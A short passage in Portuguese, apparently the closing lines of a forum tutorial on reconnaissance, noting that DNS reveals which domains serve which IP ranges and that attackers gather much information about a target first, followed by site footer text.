DNS podemos descobrir quais são os domínios que respondem por qual faixa de IPs. Então galera, foi isso, espero que vocês tenham entendido. Vamos resumir no máximo aqui: Temos que coletar bastante informação do alvo para atacá-lo, pode demorar meses mas dependendo do objetivo pode ser rápido.
Esta tabela de classificação está definida como São Paulo/GMT-03:00
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.